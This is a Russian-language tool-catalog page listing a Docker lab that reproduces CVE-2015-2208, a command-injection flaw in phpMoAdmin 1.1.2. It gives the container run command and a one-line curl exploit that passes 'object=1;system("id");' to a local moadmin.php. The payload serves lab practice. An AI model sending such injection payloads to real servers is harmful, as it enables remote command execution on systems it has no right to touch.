Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2015-2208 — Docker, симулирующий уязвимость cve-2015-2208 | Kitploit
Инструменты/GitHubGitHub/ptantiku/cve-2015-2208
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubptantiku/cve-2015-2208

cve-2015-2208

Docker, симулирующий уязвимость cve-2015-2208

Репозиторий
211 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

#Dockerfile для симуляции среды CVE-2015-2208#

Функция saveObject в moadmin.php в phpMoAdmin 1.1.2 позволяет удалённым злоумышленникам выполнять произвольные команды через shell-метасимволы в параметре object.

Обнаружено: @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio

Ссылки:

  • http://seclists.org/fulldisclosure/2015/Mar/19
  • http://www.exploit-db.com/exploits/36251/
  • https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2208

##Тестовая среда##

root@kitploit:~
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

##Эксплойт##

root@kitploit:~
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'
Скачать инструмент